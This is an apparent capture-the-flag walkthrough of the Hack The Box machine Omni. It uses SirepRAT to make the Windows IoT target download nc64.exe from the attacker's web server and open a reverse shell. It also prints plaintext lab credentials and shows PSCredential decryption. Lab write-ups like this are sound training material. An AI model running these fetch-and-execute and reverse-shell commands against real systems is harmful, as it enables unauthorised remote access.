OSCP PREPARATIONS – HTB Omni

Omni is a retired HTB machine running Windows IoT Core. The goal is to obtain the user and root flags by exploiting the vulnerabilities on this machine.
We start with an nmap scan to identify the target's services.
Classic Scan

Full Port Scan

The port scan shows three open ports: 135/tcp (msrpc, Microsoft Windows RPC), 8080/tcp (upnp, Microsoft IIS httpd) and 5985/tcp (wsman).
We begin enumerating port 8080.

Here we are prompted for credentials. We tried the default password, but could not log in.
Let's go back to nmap and look at the information it gave for port 8080:
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn’t have a title.

We encountered Windows Device Portal. Let's see whether it has a default password or something similar; let's Google it.

We tried the default credentials, but they didn't work. Let's see if there is an exploit for this.

We came across the SirepRAT tool.
SirepRAT provides full RAT capabilities without needing to write real RAT malware to the target. I downloaded this tool and ran it.

I didn't understand anything in the help section here, but it is explained in detail in the GitHub repo.
Here is an example of pulling the hosts file.

As you can see, the command worked. There is also a download part: if we get nc onto the target machine and then run it, it will give us a shell.
1- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args '/c powershell Invoke-WebRequest -OutFile C:\Users\Public\nc64.exe -Uri http://10.10.14.19:8000/nc64.exe' --v

2- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args '/c dir C:\Users\Public /b' --

(here we first transferred nc.exe, but it did not run on the target system)
3- python SirepRAT.py --v 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell.exe -command C:\Users\Public\nc64.exe -e powershell.exe 10.10.14.19 4747'

(we had nc listening in the background so that our reverse shell could connect back)
In command 1 we downloaded nc64 to the target machine.
In command 2 we checked whether nc64 was present on the target.
In command 3 we triggered nc64 to give us a reverse shell.

After getting our shell, we ran the command "Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force" and saw that the user flag was under /app, and we got the flag. But we could not access the administrator user.

We could not make sense of this flag, so we continue with local enumeration.
We list the .bat files.

Here we have credentials. Let's try to access port 8080 using them:
administrator _1nt3rn37ofTh1nGz
app mesh5143
We were able to log in using these credentials.

We continue enumerating through this interface.
We tested whether the Run command field works.

Let's try to get a shell again, this time not as the default user.
We put nc64.exe under Public.

Here we have obtained a shell.

We can't make sense of the user and root flags. They may be encrypted System.Management.Automation.PSCredential objects. Let's google it.
https://www.travisgan.com/2015/06/powershell-password-encryption.html
I looked at the blog post above and followed its instructions:
$UserCred = Import-Clixml -Path C:\data\users\administrator\root.txt
$UserCred.GetNetworkCredential().password
I recovered the root flag using these commands.

I tried the same commands on the user flag, but I was not successful. I thought it might be due to user ownership, so we connected again using the app user we had found and ran the reverse shell again.
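The ownership problem above is the expected behaviour of Export-Clixml. The following PowerShell is an added example (not from the original writeup or the HTB machine) that creates a throwaway PSCredential file with a constructed placeholder password and shows that the stored password blob unwraps only under the account that wrote it; run as any other user, Import-Clixml fails in the catch block, which is exactly why the app user's file needed the app user's shell.

```powershell
# Added example, not part of the original writeup. Export-Clixml stores a
# PSCredential password as a DPAPI blob bound to the writing user (and host),
# so the Import-Clixml trick only works as that same user.

function New-DemoCredentialFile {
    param([string]$Path)
    # Constructed sample credential; the password is a placeholder value.
    $secure = ConvertTo-SecureString 'Demo-Placeholder-P@ss' -AsPlainText -Force
    $cred = New-Object System.Management.Automation.PSCredential('demo_user', $secure)
    $cred | Export-Clixml -Path $Path
    return $Path
}

function Test-CredentialFile {
    param([string]$Path)
    $raw = Get-Content -Path $Path -Raw
    # The password sits in <SS N="Password"> as ConvertFrom-SecureString output:
    # a hex string that only the owning user's DPAPI master key can unwrap.
    $blob = [regex]::Match($raw, '<SS N="Password">([0-9a-fA-F]+)</SS>').Groups[1].Value
    $result = [ordered]@{ UserName = $null; Decrypted = $false; BlobUnwraps = $false; Error = $null }
    try {
        # Same two steps the post uses on root.txt.
        $cred  = Import-Clixml -Path $Path
        $plain = $cred.GetNetworkCredential().Password
        $result.UserName  = $cred.UserName
        $result.Decrypted = ($plain.Length -gt 0)
    } catch {
        # Under a different account this is "Key not valid for use in specified state".
        $result.Error = $_.Exception.Message
    }
    # Unwrap the raw blob directly, without the XML wrapper; same DPAPI rule applies.
    try { $null = ConvertTo-SecureString -String $blob; $result.BlobUnwraps = $true }
    catch { $result.BlobUnwraps = $false }
    return [pscustomobject]$result
}

$file = New-DemoCredentialFile -Path (Join-Path $env:TEMP 'cred-demo.xml')
Test-CredentialFile -Path $file | Format-List
Remove-Item -Path $file -ErrorAction SilentlyContinue
```

Run the script once as yourself, then point Test-CredentialFile at the same file from a session running as another local user to see Decrypted and BlobUnwraps turn false.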

This is how we got the user flag.